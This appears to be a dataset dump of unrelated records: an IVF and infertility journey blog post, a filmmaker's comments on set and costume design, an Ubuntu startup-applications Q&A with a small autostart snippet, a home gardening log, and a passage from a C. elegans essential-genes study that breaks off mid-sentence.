I belong to a pregnancy after infertility group on Facebook and we each wrote up a bio of ourselves and our journey. I know there are a lot of you who have been following me for a long time, but I thought it would be interesting to post my bio, because the whole journey is here all in one blog post. Look, I even linked some past posts for your enjoyment. Someday, when my sweet baby is old enough, I will tell her exactly how much love and hope we had for her, long before she was conceived. My husband Chris and I started dating in 2004 and were married July of 2008. I was 22 when we got married. I was in nursing school at the time, so we waited until I graduated a year later “because I don’t want to be pregnant in nursing school.” I went off birth control May of 2009 and after using ovulation kits with timed intercourse without success, I went to my primary doctor in October of 2010. She did some basic tests, found nothing wrong and referred me to an OB/GYN. I was soon diagnosed with low progesterone as my 21-day progesterone level was 1.97. I started Clomid (unmonitored) and it made my progesterone go up to 16.5, but no pregnancy. I did three cycles of Clomid before we decided to take a break. In January 2012, I went to a new OBGYN and did 4 more rounds of Clomid. Looking back… I probably would have seen an RE earlier, but A) I was clueless and B) I was scared of the cost. Finally in November, I got a referral to CRM and we made an appointment. We had a $10,000 lifetime max on infertility treatments and another $10,000 for meds. Our first IUI with Clomid (again with the Clomid already) I ovulated early and we were told to do TI after my trigger shot… on Christmas Eve and Day. It was incredibly sexy and I am being incredibly sarcastic. We proceeded to do three actual IUIs that were back to back, all with Clomid and progesterone, all negative. When we conferenced with the doctor, it was determined that the next step was the big scary IVF. In April-June of 2013, IVF became a reality. However, in May, right before we were starting the cycle, our insurance company informed us that all the past claims they’ve been paying for the IUIs “never should have been paid” and they weren’t going to pay for anything else going forward. Remember Puppy Killer? Something about our clinic not being a “clinic of excellence” (even though CRM is the best clinic in Minnesota as far as success rates). After an emotional battle with them (I hate insurance companies) and lots of strings pulled by an HR rep at Chris’s work, we were grandfathered in for one IVF cycle. This was two days before I was to start my stims. The final US showed only 5 mature follicles and the doctor called me at work, telling me that because this was on the insurance company’s dollar, he felt we could proceed with retrieval. We ended up with 10 eggs, 5 that were mature, 3 became embryos and we were able to transfer our one remaining 3 day embryo in June. In July, the beta went from 63 to 56 and it was ruled a chemical on our 5 year anniversary. I took it hard. Really hard. I named him Adam, believing him to be a boy and grieved him for a long time. Even now, there is a pain in my chest when I think about him, because he was my first, he was the one that made me a mom. I started the process again in September for IVF #2, this time in the Attain program. That process signing up for Attain was fun too. We knew we’d either get that money back, or come home with a baby. Luckily, Chris was able to take a loan out against his 401k. 
This time we did a micro-Lupron protocol with trigger shots 12 hours apart. The final US showed 6 mature follicles all on my left side. The report showed 8 eggs, 4 were mature, one caught up later. But even after ICSI (where the sperm is injected right into the egg), we were only left with one day-6 embryo that was behind. I spent the two-week-wait in tears, knowing this cycle was a bust. I took one home pregnancy test, and it was negative and in November, I received a negative beta. We consulted with the doctor, talked about adding steroids with an antigon cycle (meds given to beef up the follicles without (hopefully) ovulating early). We were definitely looking at an egg quality issue, that much was very apparent. We decided on one more IVF before moving on to donor eggs. In December 2013, I started the process for IVF #3, but soon developed dangerously high BP which landed me in the ER. We determined the steroids were to blame, but I also had to be taken off the birth control pills and probably will never go back on them. The cycle was cancelled until my BP was under control with meds. In May 2014, things stabilized, I was able to go off the blood pressure meds, but eventually would go back on them for creeping blood pressure (my PCP warned me I may now have blood pressure issues for a lifetime). We started stims for IVF#3. The doses were adjusted and I did the antigon med, but still, only 5 eggs were retrieved and only 1 was mature, ironically, the worst cycle I’ve had. The embryo was behind, and not surprising, I got my BFN (big fat negative) at the end of the month. Attain, not surprisingly, kicked us out of the program (“You have shitty eggs, BIOTCH!”) and we ended up meeting with the donor coordinator in July for a fresh donor egg (DE) cycle. We couldn’t afford Attain for DE as it was about $45,000. We didn’t want to use an outside egg bank, so we looked at a fresh cycle for about $25,000. During this same time, my friend Celina contacted me, saying her clinic in Texas offers a guarantee program where if a cycle doesn’t work, the doctor waives his fees for the next cycle. We found out they have a donor program that was their own frozen egg bank. We decided to do a phone consult with a doc there and asked about that program. All in all, we found out it was about $10,000 cheaper than a fresh cycle here. We took a leap of faith, and in August, chose our donor, completed the paperwork and finalized it all. We flew to Texas in October 2014 for our cycle, which gave us 8 frozen eggs. We stayed with Celina and her husband (and of course became total BFFs in the process) and found out all 8 eggs fertilized! This was more than we’ve ever had. However, transfer day left us with a disheartened doctor and two embryos, one of which was a day behind, the other, two. We had nothing left to freeze. He thought it was because the eggs didn’t survive the thaw. This donor was not proven, but she looked the most like me and I went on a wing and a prayer. I received a faint positive 11dp5dt and experienced cramping and a “pulling” feeling down in my uterus. This was the first time, I had experienced actual pregnancy symptoms and I held out hope. But I received a BFN 14dp5dt and after consulting with the doctor with my symptoms and faint positive home pregnancy test, we determined it was another chemical. This was when I truly started facing the fact that having a child may not be in my future. It terrified me and I started asking myself if I could live without children. 
It was definitely a dark time, and we started casually talking about fostering, even though I knew this would never make it ok. Our Texas doctor wanted to run a miscarriage panel, including MTHFR. All my labs came back normal in December 2014 but behold, the MTHFR was positive. I couldn’t believe it. Finally, some sort of answer. Yes, we knew I had bad eggs, but maybe this was the reason we would lose the pregnancies that did make it. I was placed on Folgard for the folic acid deficiency which the MTHFR gene mutation could be responsible for (more or less. It’s a confusing thing) and a daily baby aspirin. We picked another donor in January 2015 and paid all the fees (less now, thanks to the doctor waiving his fees). I chose the most popular donor (no more messing around) and we faced the fact that this will probably be our last cycle. We had no more money, and really, when 3 IVFs and 2 donor cycles fail, what does that leave you with? We had already decided adoption was not for us, at least in the near future. In March, I started estrace as with my previous DE cycle, but this time, my estrogen decided not to cooperate and we had a nerve-wracking few weeks as we faced dose changes and the possible cancelled cycle. Because nothing about this journey was ever smooth sailing, right? But we flew back to Texas and the last lab work showed my labs to (finally) be in normal range. We found out 6 of the 8 eggs fertilized. To be honest, this scared me a bit, losing two. We needed all we could get. The night before transfer, we drove to Galveston with Celina and and her baby to spend my bed rest in a beach house along the ocean. Transfer the next morning revealed a very happy doctor, two early blasts and a sobbing Risa. He told us there was a morula that could possibly make it to blast to be able to freeze. For the first time, since maybe the first IVF, I was so happy I could burst. There seemed to finally be a silver lining. I had already started my Lovenox protocol, so that would hopefully prevent my blood from clotting (another thing MTHFR may be responsible for). The next day, while on my bed rest couch across from Celina, I found out not only did the third embryo make it to blast, but two others of the original six caught up and one was a hatching blast. We had three embryos to freeze and two almost perfect blasts snuggling in inside me and even now, I sit here crying when I think of how much we’ve struggled and how everything in our journey led up to this. We flew home at the end of March and on 3/31, I got my positive on a generic test. On April 8th, 14dp5dt, my beta was 564! Then 1,224! Then 3,655! On April 14, we saw one GS and one yolk sac and at 6 weeks, we saw a fetal pole with a HR of 111. I was released from the Texas clinic at 12 weeks and today I am 16w4d. I’ve had no bleeding, no cramping and it’s more than I could have ever asked for. And now I’m sitting here, crying, because this journey has been so shitty and heartbreaking and now I have this miracle inside me, squirming around and waving and making me nauseous and I know it’s cliché but I never thought this day would come. I’m continuing to take it day by day and so thankful for that crazy idea of flying to Texas and meeting Celina in person and snatching that donor and her last 8 frozen eggs. 
I look back at my infertility timeline and I laugh so hard when I think of how my husband and I were debating when to do our first IUI to make sure it didn't conflict with a vacation, because it was going to be as easy as scoring on the first treatment… *hugs* what an amazing journey!! I'm so happy for you that you're finally at this point in your pregnancy
null
minipile
NaturalLanguage
mit
null
“In the house, it was important that they have bits and pieces of the culture, but it wasn’t over the top and stereotypical. My parents’ home had a mix of Western things, and things that were more Pakistani-American, or religiously-influenced. So, the production design was important for that. But also Hala’s clothing. She needed to look like a modern teenager, and I didn’t want her to stand out so much that we are thinking that she’s an other. She’s not. It’s that these are multiple identities. Because she lives in America, of course she’s going to be influenced by American fashion, [like] the way she wears her sneakers — even the way she wears her hijab. Sometimes it’s messy, and it’s not perfect because she’s a teenager, and she’s in a rush, and she’s got places to be. In her room, she has the prayer rug and sometimes it’s out and she’s praying on it, and sometimes it’s stowed away. But her room is also like any other teenage girl’s. All those things were important when I would talk to the heads of departments, to make sure it all feels like everything you place in the rooms, everything they wear, has to feel like it has a story, and it came from somewhere real.”
null
minipile
NaturalLanguage
mit
null
Q: How to add Nitrotasks to startup applications in Ubuntu 12.10? Always, when I want to add an application to startup, I use the system monitor to find the run-command and then add it to startup. But in Nitrotasks' case the run-command is "/usr/bin/python/opt/nitro/bin/nitrotasks" and when I add it, it doesn't work. I've checked "nitrotasks" too. What do you suggest? A: To add an application to start-up applications, just type start in Dash, and click on Startup Applications. Once you click on it, and the new window opens, click on Add to add your desired application. A window will open asking for the app's info. Once you're done filling out all the information, click on Add, and you're done.
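For reference, what the Startup Applications dialog effectively creates is an XDG autostart entry under ~/.config/autostart. The Python snippet below is a minimal sketch that writes such an entry; the Exec line is an assumption based on the command quoted in the question (with a space added between the interpreter and the script path), and the file name is arbitrary.

from pathlib import Path

# Assumed command; the question's run-command suggests
# "/usr/bin/python /opt/nitro/bin/nitrotasks" (interpreter + script).
entry = """[Desktop Entry]
Type=Application
Name=Nitrotasks
Exec=/usr/bin/python /opt/nitro/bin/nitrotasks
X-GNOME-Autostart-enabled=true
"""

autostart_dir = Path.home() / ".config" / "autostart"
autostart_dir.mkdir(parents=True, exist_ok=True)
(autostart_dir / "nitrotasks.desktop").write_text(entry)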
null
minipile
NaturalLanguage
mit
null
This year my goal is to grow 2,000 pounds of fresh fruits and vegetables. I think I can do it. With 16 raised garden beds, a greenhouse, a raspberry patch and a few more planting beds sprinkled throughout our property, I think growing 2,000 pounds of food is an attainable goal. Even if I do live right in the middle of high maintenance suburbia. Sweet potato slips were planted this week. This is our first year growing them. If you have any advice about growing sweet potatoes I should know about, please leave a comment below. ♥Mavis ~~~~~~~~~~~~~~~~~~~ I have spent a total of $414.90 on seeds, soil, plants and supplies for this year. I believe people have lost touch with what the term "fresh produce" really means. Fresh produce is not something that has been flown in from 1,500 miles away and has been sitting on a grocer's shelf for five days. The true meaning of "fresh produce," in my opinion, is walking out your back door and harvesting your own food. Real food does not come in a box nor does it need an ad campaign. Real food does not come with a rebate, or an incentive to buy. One bite of an heirloom tomato on a warm summer's day is all the convincing you'll need to keep coming back for more. Real food will sell itself, hands down, any day of the week. ~~~~~~~~~~~~~~~~~~~ I have spent a total of $412.40 on seeds, soil, plants and supplies for this year. Today was the first day since I began my little adventure/wish of trying to grow 2,000 lbs of garden produce that I thought I might actually be able to do this, like for real. Sure I've had a garden before, but we're talking a few tomato, cucumber, pumpkin and maybe bean plants. Nothing like what I've got going on this year. Not even close. I started the day by harvesting 6 lb 10 oz of shelling peas, checked in on the chickens, then went down to my neighbor's yard (who's moving tomorrow) and planted her 4 garden boxes with beans, carrots, squash, radish, and 18 cabbage. I'll be going back in a few more days to plant the parsnips. I know I'm taking a bit of a gamble with planting in her backyard boxes because if her house sells before I can harvest…. well, let's just say the new homeowners will be picking their own dinner. I was able to harvest 1 lb 4 oz of sage and 12 oz of oregano from her herb box {she was going to pull them out if I wasn't going to use them} and then came home and washed and bundled up the herbs for drying. I was also able to pick a few strawberries and 1 lb 6 oz of wild salmon berries as well. All in all, a good day. I'm beginning to think that if I had to grow all our food we would starve to death. Today's harvest? 2 oz radish, 2 oz lettuce and 1 oz broccoli. Maybe growing 2,000 lbs of garden produce is going to be harder than I thought. Yippee! Something else for me to plant! The seed potatoes arrived today from Seed Savers. I like surprises so I ordered the 20 lb sampler. I don't know if I'm more excited about the potatoes or the cute little muslin bags they came in. I can't wait to re-use them.
I received 2.5lbs of each of the following varieties: All Blue, Yukon Gold, La Ratte, Purple Viking, Kerr’s Pink, Red Gold, All Red & Austrian Crescent. I’ll keep you posted on how they grow! This post may contain affiliate links. These affiliate links help support this site. For more information, please see my disclosure policy. Thank you for supporting One Hundred Dollars a Month.
null
minipile
NaturalLanguage
mit
null
Background {#Sec1} ========== Essential genes are absolutely required for the viability of an organism such that loss of function mutation in essential genes will lead to lethality or unviable progeny \[[@CR1], [@CR2]\]. Recent research has shown that essential genes are associated with human diseases and conditions such as miscarriages \[[@CR3], [@CR4]\] and cancers \[[@CR5]--[@CR7]\]. The discovery of many important essential genes, such as *let-60/Ras* \[[@CR8]\] and *let-740/dcr-1* \[[@CR9], [@CR10]\], were attributed to the use of model organism *Caenorhabditis elegans*, in which essential genes is estimated to take up 25% of all the genes \[[@CR11]--[@CR13]\]. In mammals, approximately one-third of all mammalian genes are essential for life \[[@CR14]\]. Due to the importance of essential genes, large scale efforts have been undertaken to identify the complete set of essential genes and to understand their function. For instance, 3326 murine genes were identified to be essential upon knockout, which accounts for 14% of the murine genome \[[@CR14], [@CR15]\]. Many of the essential genes in mice are enriched in human disease genes \[[@CR7], [@CR15]\], such as cardiovascular (GATA4), neoplasms (KLF6), and nervous system (HOXA1). Similar large-scale loss-of-function studies is also available for several other model organisms including *Saccharomyces cerevisiae* \[[@CR16], [@CR17]\], *Schizosaccharomyces pombe* \[[@CR18]\], *Drosophila melanogaster* \[[@CR19]--[@CR24]\], and *Danio rerio* \[[@CR25], [@CR26]\]. In *C. elegans*, RNAi knock-down phenotypes were examined for roughly 92% of the *C. elegans* genes and about 3500 genes (\~ 17%) have been annotated as essential \[[@CR13], [@CR27], [@CR28]\]. While RNAi was successful in applying genome-wide targeted approach to identify genetic phenotypes, it is limited to only knock-down gene expression instead of fully knock-out gene expression and are unable to maintain the phenotype over longer periods of time \[[@CR13], [@CR29]\]. The best approach is by mutagenesis and screen for gene knock-outs. The concerted effort in the *C. elegans* Deletion Mutant Consortium along with the Million Mutation Project has generated loss-of-function alleles in 13,760 of 20,514 protein-coding genes \[[@CR30]\]. The great majority of the mutants from the above resources, however, are largely non-lethal mutations as their approach requires the mutant strain to propagate \[[@CR30]\]. An effectively way to screen and maintain lethal mutations is to use genetic balancer systems \[[@CR31]\]. Nearly 70% of the *C. elegans* genome is balanced by genomic rearrangements such as duplications, translocations, and inversions \[[@CR31], [@CR32]\]. Duplication balancers do not cross-over with normal chromosomes and thereby providing a third allele that carries the wildtype rescuing allele \[[@CR31]\]. The large chromosomal duplications are not replicated and they segregate in a non-Mendelian fashion such that it is not pass down to daughter cells equally in meiosis. The progeny inheriting the duplication will survive while the progeny without the duplication will not. Previous genetic studies have identified 103 essential genes mapped to 5.4 Mb region of Chromosome I balanced by the duplication *sDp2* \[[@CR33]\]. We have previously combined the mapping data with next generation sequencing to identify the molecular identities of many essential genes but many more are still uncharacterized \[[@CR27]\]. 
Many studies have suggested that genes are not randomly disturbed in the genome. For instance, the chromosomal clustering of housekeeping genes \[[@CR34]\] and the distribution biases of the sex-regulated genes \[[@CR35]\] can be found in the genome. Recent technological advances in chromatin-conformation capture methods have allowed in-depth study of genome organization. Methods such as 3C \[[@CR36]\], 4C \[[@CR37]\], Hi-C \[[@CR38]\], and ChiA-PET \[[@CR39], [@CR40]\] examines genomic fragments that are close in proximity in nuclear space and have been successfully applied to bacteria \[[@CR41]--[@CR43]\], yeast \[[@CR44]--[@CR46]\], *Plasmodium falciparum* \[[@CR47]\], plants \[[@CR48], [@CR49]\], *C. elegans* \[[@CR50], [@CR51]\], fruit fly \[[@CR52], [@CR53]\], mouse \[[@CR54], [@CR55]\], and humans \[[@CR38], [@CR55]--[@CR57]\]. By crosslinking genomic fragments that are close in space followed by high-throughput sequencing, Hi-C is able to identify the loci that are close in space but not necessarily close in genomic coordinates \[[@CR38], [@CR57]--[@CR59]\]. The chromatin interactions in the genome can form domains called topologically associating domains, or TADs, which are megabase-pair size regions where intra-chromatin interactions occur more frequently than other chromatin regions \[[@CR55], [@CR60]\]. TADs share a high degree of similarity in the domain organization across different cell types and are conserved between mice and humans, suggesting that TADs are the stable domain organization in mammalian genomes \[[@CR55]\]. Functionally related genes showed higher clustering on the chromosomes \[[@CR61]\] and may be linked in their gene expression regulation. Functionally linked genes, including co-expressed genes, genes in common pathway, or genes with protein-protein interaction exhibit higher clustering on chromosomes in both *Escherichia coli* and humans \[[@CR62], [@CR63]\]. TAD boundaries, defined as genomic region between TADs, are abundant in transcription start sites, active transcription, active chromatin marks, housekeeping genes, and tRNA genes \[[@CR55]\]. These findings inspired us to consider whether genes with same essentiality or co-expression genes have some spatial localization features and whether essential genes show enrichment in TAD boundaries. Results {#Sec2} ======= Identification of genomic mutations in 130 chromosome I mutants {#Sec3} --------------------------------------------------------------- Genomic DNA libraries of 130 mutant strains (Additional file [1](#MOESM1){ref-type="media"}) with *dpy-5 (e61)* and *unc-13 (e450)* balanced by *sDp2* were prepared and sequenced using Illumina HiSeq to generate 100 bp paired end reads. We achieved an average sequencing depth of 23X across the whole genome and an average depth of 28X in coding regions. The *dpy-5 (e61)* and *unc-13* (*e450*) identified previously are used as a quality check \[[@CR27]\]. For *unc-13*, the variant ratio is expected to be 100% because the *sDp2* does not balance that allele. For *dpy-5*, a 66% variant ratio is expected because the *sDp2* carry a rescuing allele \[[@CR27]\]. In our sequencing data, we found 23 strains without the expected *dpy-5 (e61)I* and *unc-13 (e450)I* mutation and they were removed from further analysis. In the case of 4 strains where there is insufficient sequencing (below 8X coverage), *let-394 (h235)*, *let-545 (h842)*, *let-395 (h271)*, and *let-122 (h226)* were also removed from subsequent analyses. As a result, a total of 103 strains were analyzed. 
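As an aside, the dpy-5/unc-13 sanity check described above lends itself to a simple automated screen. The sketch below (Python; the 15% tolerance is an illustrative assumption, while the ~66%/100% expectations and the 8X depth cut-off come from the text) flags strains whose marker variant ratios do not match the balancer genetics.

def variant_ratio(alt_reads, total_reads):
    # Fraction of reads supporting the mutant allele at a marker position.
    return alt_reads / total_reads if total_reads > 0 else 0.0

def marker_qc(dpy5_alt, dpy5_total, unc13_alt, unc13_total,
              min_depth=8, tol=0.15):
    # unc-13(e450) is not balanced by sDp2, so essentially all reads should be
    # mutant; dpy-5(e61) is rescued by a wild-type copy on sDp2, so roughly
    # two-thirds of reads should be mutant. Strains below the depth cut-off
    # are excluded, mirroring the 8X threshold used above.
    if dpy5_total < min_depth or unc13_total < min_depth:
        return False
    dpy5_ok = abs(variant_ratio(dpy5_alt, dpy5_total) - 0.66) <= tol
    unc13_ok = variant_ratio(unc13_alt, unc13_total) >= 1.0 - tol
    return dpy5_ok and unc13_ok

# Example: 20/30 mutant reads at dpy-5 and 25/25 at unc-13 passes the check.
print(marker_qc(20, 30, 25, 25))  # True
print(marker_qc(5, 30, 25, 25))   # False: dpy-5 ratio far from ~0.66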
Identification of essential genes {#Sec4}
---------------------------------

Improving upon a method previously adapted for identifying lethal mutations on Chromosome I balanced by *sDp2* \[[@CR27]\], we identified 58 putative lethal mutations in 103 strains. These putative lethal mutations fall into 44 genes. The full list of *let* genes with their identified sequences is shown in Table [1](#Tab1){ref-type="table"} and Additional file [2](#MOESM2){ref-type="media"}.

Table 1 Biological functions of the identified 44 essential genes

| *let* name | Essential gene | Alleles | Allele mutation (nucleic acid) | Allele mutation (protein) | Pfam | KOG | Evolutionary conservation |
|---|---|---|---|---|---|---|---|
| *let-609* | *let-363* | h191 | C -> T | R -> X | Phosphatidylinositol 3- and 4-kinase | Replication, recombination and repair | I,F,M,N |
| *let-643* | *nath-10* | h500 | G -> A | R -> K | GNAT acetyltransferase 2 | General function prediction only | I,F,M,N |
| *let-624/let-644/let-622* | *npp-6* | h449, h839, h222 | C -> T | Q -> X | Nucleoporin Nup120/160 | Unknown | I,F,M,N |
| *let-610* | *asd-2* | h695 | C -> T | P -> S | Homodimerisation region of STAR domain protein | RNA processing and modification | I,F,M,N |
| *let-639/let-371* | *hcp-6* | h779, h123 | G -> A | W -> X | non-SMC mitotic condensation complex subunit 1 | Function unknown | I,F,M,N |
| *let-138/let-150/let-357* | *spg-7* | h744, h282, h89 | G -> A | W -> X | Peptidase family M41 | Posttranslational modification, protein turnover, chaperones | I,F,M,N |
| *let-163* | *sep-1* | h483 | C -> T | Q -> X | Peptidase family C50 | Cell cycle control, cell division, chromosome partitioning | F,M,N |
| *let-133* | *Y71G12B.8* | h440 | T -> A | Y -> X | DEAD/DEAH box helicase | RNA processing and modification | I,F,M,N |
| *let-593* | *inx-13* | h212 | C -> T | Q -> X | Innexin | Unknown | I,F,N |
| *let-625* | *rpl-4* | h506 | G -> A | D -> N | Ribosomal protein L4/L1 family | RNA processing and modification | I,F,M,N |
| *let-633/let-638* | *B0261.1* | h696, h778 | C -> T | R -> X | Myb DNA-binding like | Transcription | I,F,M,N |
| *let-648* | *vha-16* | h781 | G -> A | D -> N | Unknown | Unknown | I,N,M,F |
| *let-615* | *rpl-13* | h529 | C -> T | Q -> X | Ribosomal protein L13e | Translation, ribosomal structure and biogenesis | I,F,M,N |
| *let-356* | *cdc-6* | h501 | G -> A | G -> R | ATPase family associated with various cellular activities (AAA) | Cell cycle control, cell division, chromosome partitioning; replication, recombination and repair | I,F,M,N |
| *let-505* | *tufm-2* | h426 | C -> T | R -> X | Elongation factor Tu GTP binding domain | Translation, ribosomal structure and biogenesis | I,F,M,N |
| *let-128* | *C53H9.2* | h253 | 465+1G -> A | None | 50S ribosome-binding GTPase | General function prediction only | I,F,M,N |
| *let-398* | *gpc-2* | h257 | C -> T | Q -> X | GGL domain | Signal transduction mechanisms | I,F,M,N |
| *let-619/let-105* | *dip-2* | h348, h681 | C -> T | H -> Y | AMP-binding enzyme | General function prediction only | I,F,M,N |
| *let-649/let-109* | *him-1* | h491, h811 | G -> A | G -> R | RecF/RecN/SMC N terminal domain | Cell cycle control, cell division, chromosome partitioning | I,N,M,F |
| *let-578* | *npp-11* | h512 | G -> A | W -> X | Nucleoporin FG repeat region | Intracellular trafficking, secretion, and vesicular transport; nuclear structure | I,F,M,N |
| *let-543/let-544* | *sacy-1* | h792, h692 | G -> A | G -> R | DEAD/DEAH box helicase | RNA processing and modification | I,F,M,N |
| *let-614* | *rmh-1* | h147 | C -> T | S -> L | RecQ mediated genome instability protein | Function unknown | F,N |
| *let-582* | *egg-4* | h726 | G -> A | A -> T | Protein-tyrosine phosphatase | Signal transduction mechanisms | I,F,M,N |
| *let-528* | *cytb-5.2* | h1012 | G -> A | W -> X | Cytochrome b5-like Heme/Steroid binding domain | Energy production and conversion | I,F,M,N |
| *let-511* | *W09C3.4* | h755 | 262-1G -> A | None | RNA polymerase Rpc34 subunit | Transcription | I,F,M,N |
| *let-135* | *pop-1* | h268 | G -> A | A -> T | HMG (high mobility group) box | Transcription | I,F,M,N |
| *let-502* | *spe-5* | h767 | C -> T | S -> F | ATP synthase alpha/beta family, nucleotide-binding domain | Energy production and conversion | I,F,M,N |
| *let-143* | *npp-13* | h513 | G -> A | G -> E | Nup93/Nic96 | Cell cycle control, cell division, chromosome partitioning | I,F,M,N |
| *let-571* | *eif-2gamma* | h347 | G -> A | G -> R | Initiation factor eIF2 gamma, C terminal | Translation, ribosomal structure and biogenesis | I,F,M,N |
| *let-155* | *inx-21* | h461 | C -> T | R -> X | Innexin | Unknown | I,F,N |
| *let-162* | *Y47G6A.18* | h460 | G -> A | G -> E | Golgi phosphoprotein 3 (GPP34) | Intracellular trafficking, secretion, and vesicular transport | I,F,M,N |
| *let-510* | *Y47G6A.19* | h740 | 1355-1G -> A | None | Zinc carboxypeptidase | Function unknown | I,F,M,N |
| *let-357* | *lpd-3* | h132 | 1539+1G -> A | None | Fragile site-associated protein C-terminus | Unknown | I,F,M,N |
| *let-546* | *xpo-2* | h227 | G -> A | W -> X | Cse1 | Intracellular trafficking, secretion, and vesicular transport; nuclear structure | I,F,M,N |
| *let-121/let-146* | *cdt-1* | h810, h197 | C -> T | Q -> X | DNA replication factor CDT1 like | Unknown | I,F,M,N |
| *let-130* | *lpr-1* | h773 | G -> A | R -> Q | Unknown | Unknown | F,N |
| *let-573* | *rpl-1* | h247 | C -> T | T -> I | Ribosomal protein L1p/L10e family | Translation, ribosomal structure and biogenesis | I,F,M,N |
| *let-145* | *arx-1* | h182 | C -> T | Q -> X | Actin | Cytoskeleton | I,F,M,N |
| *let-123/let-142/let-583* | *cogc-3* | h413, h518, h738 | G -> A | G -> R | Sec34-like family | Intracellular trafficking, secretion, and vesicular transport | I,F,M,N |
| *let-577* | *sop-3* | h503 | G -> A | E -> K | Unknown | Unknown | F,M,N |
| *let-548/let-144* | *tln-1* | h356, h393 | C -> T | Q -> X | Talin, middle domain | Cytoskeleton | I,F,M,N |
| *let-131* | *Y71G12B.6* | h817 | C -> T | Q -> X | GDP-mannose 4,6 dehydratase | Unknown | F,N |
| *let-392* | *nekl-2* | h120, h122 | G -> A | G -> E | Protein kinase domain | General function prediction only | F,M,N |
| *let-374* | *lpd-5* | h251 | G -> A | W -> X | Unknown | Unknown | I,F,M,N |

The table includes the 44 essential genes identified in this study, with the *let-x* name, alleles, allele mutations, biological functions, and evolutionary conservation. N: nematodes; I: invertebrates (*Drosophila*); M: mammals (mouse, human); F: fungi (*Saccharomycetaceae*).

Novel essential genes identified {#Sec5}
--------------------------------

Of the essential genes we have identified, 6 are new putative essential genes for which no other knock-out alleles have been generated. Of these 6 genes, *let-633/let-638* (B0261.1) is orthologous to a novel Myb-like leucine zipper transcription factor, which is necessary for cell proliferation, apoptosis, and differentiation, and plays an important role in the pathogenesis of adenoid cystic carcinoma \[[@CR64]--[@CR66]\]. *let-128* (C53H9.2) is orthologous to a 50S ribosome-binding GTPase; previous research has shown that many *Escherichia coli* GTPases are important in ribosome biogenesis \[[@CR67]\]. Mitomycin C-induced mutations in this gene also indicate that it is essential for survival \[[@CR68]\].
*let-511* (W09C3.4) is orthologous to the RNA polymerase Rpc34 subunit, which plays a key role in the recruitment of RNAP III to the pre-initiation complex \[[@CR69], [@CR70]\]. *let-162* (Y47G6A.18) is orthologous to Golgi phosphoprotein 3, a peripheral membrane protein of the Golgi stack that plays a regulatory role in Golgi trafficking \[[@CR71]\]. *let-510* (Y47G6A.19) is orthologous to a zinc carboxypeptidase, a protease that hydrolyzes peptide bonds at the carboxy-terminal end of a protein or peptide. *let-131* (Y71G12B.6) is orthologous to GDP-mannose 4,6 dehydratase, which is essential for the first step of the GDP-fucose biosynthesis pathway \[[@CR72]\].

Functions of the identified 44 essential genes {#Sec6}
----------------------------------------------

To understand the biological roles of essential genes, we first examined the functions of the 44 essential genes identified in this study based on their orthologous genes (Table [1](#Tab1){ref-type="table"}). Among the 44 genes, 13 essential genes encode enzymes, such as the 50S ribosome-binding GTPase, the RNA polymerase Rpc34 subunit, the ATP synthase alpha/beta family nucleotide-binding domain, and protein-tyrosine phosphatase. We found 5 genes related to ribosome biology and biogenesis (Additional file [3](#MOESM3){ref-type="media"}, column: KEGG). Twelve essential genes were found to be involved in protein metabolic processes (Additional file [3](#MOESM3){ref-type="media"}). Because the biological roles of essential genes are fundamental, essential genes are often conserved across different species. We investigated the orthologs of these essential genes in other nematodes (N), invertebrates (I; *D. melanogaster*), mammals (M; mouse and human), and fungi (F; family *Saccharomycetaceae*), as shown in Table [1](#Tab1){ref-type="table"}. We found that 35 of 44 (79.5%) essential genes were conserved in all the examined organisms. Three of the genes were conserved only in fungi and nematodes, such as *let-130*/*lpr-1*, a gene expressed by the duct, pore, and surrounding cells that is required at a time of rapid luminal growth \[[@CR73]\]. Three genes were conserved in nematodes, fungi, and mammals; for example, *let-163*/*sep-1*, a member of peptidase family C50, encodes the *C. elegans* ortholog of separase, a cysteine protease first discovered in yeast, and *sep-1* activity is required for a number of cell cycle events including sister chromatid separation and membrane trafficking \[[@CR28]\]. We found two genes conserved in nematodes, fungi, and invertebrates but not in mammals. For instance, *let-593*/*inx-13* encodes an innexin, an essential transmembrane channel protein involved in building invertebrate gap junctions.

Gene essentiality analysis {#Sec7}
--------------------------

To conduct the gene essentiality analysis, four groups of genes were used for comparison: Group one (G1): essential genes that were isolated through genetic screens and are fully sequenced and analysed by high-throughput methods dependent on the use of allelic ratios \[[@CR27], [@CR33], [@CR74]\] (82 in total). Group two (G2): essential genes that have published alleles or RNAi supporting lethal phenotypes in the region of chromosome I balanced by *sDp2* (366 in total). Group three (G3): essential genes that have published alleles or RNAi supporting lethal phenotypes (3083 in total).
Group four (G4): non-essential genes that have no observable lethal phenotypes caused by either RNAi or known alleles (16,018 in total). We compared the functions of genes from the four groups based on GO annotations (Cellular Component, Biological Process, and Molecular Function) and the PANTHER Protein Classification (Fig. [1](#Fig1){ref-type="fig"}).

Fig. 1 Heat map analysis of significantly enriched gene functions based on the PANTHER Overrepresentation Test. The hierarchical cluster diagram was constructed using pheatmap clustering in R. The *P*-values for each annotation data set (**a** Molecular Function, **b** Biological Process, **c** Cellular Component, and **d** PANTHER Protein Class) were calculated with the Bonferroni correction for multiple testing within each functional group, and reflect the significance of the difference in enrichment between essential and non-essential genes. Red boxes indicate that a functional group is overrepresented, while blue boxes indicate the opposite. *P*-values were converted to -log10(*P*) for the heat map; the converted value is set to 0 when the *P*-value is greater than 0.05 and capped at 10 when the *P*-value is less than 1e-10.

For the Molecular Function annotation analysis, genes from G1, G2, and G3 do not show a significant difference in any Molecular Function annotation. However, annotations such as catalytic activity (GO:0003824) (*P-value* = *4.77e*^*− 17*^) and pyrophosphatase activity (GO:0016462) (*P-value* = *1.27e*^*− 8*^) are significantly underrepresented in G4 (Fig. [1](#Fig1){ref-type="fig"}a). This is consistent with our observation in the Cellular Component analysis, in which the annotations intracellular (GO:0005622) (*P-value* = *2.74e*^*− 132*^), protein complex (GO:0043234) (*P-value* = *4.40e*^*− 70*^), and macromolecular complex (GO:0032991) (*P-value* = *6.47e*^*− 129*^) are overrepresented in G3 (Fig. [1](#Fig1){ref-type="fig"}b). With regard to Biological Process, essential genes in G3 are significantly enriched for cellular process (GO:0009987) (*P-value* = *6.06e*^*− 99*^), as well as nitrogen compound metabolic process (GO:0006807) (*P-value* = *1.28e*^*− 80*^) and nucleobase-containing compound metabolic process (GO:0006139) (*P-value* = *4.69e*^*− 133*^), suggesting that essential genes tend to be involved in protein synthesis. In contrast, G4 protein products are significantly enriched for the regulation of system process (GO:0003008) (*P-value* = *4.65e*^*− 5*^), such as sensory perception (GO:0007600) (*P-value* = 3.90*e*^*− 5*^), neurological system process 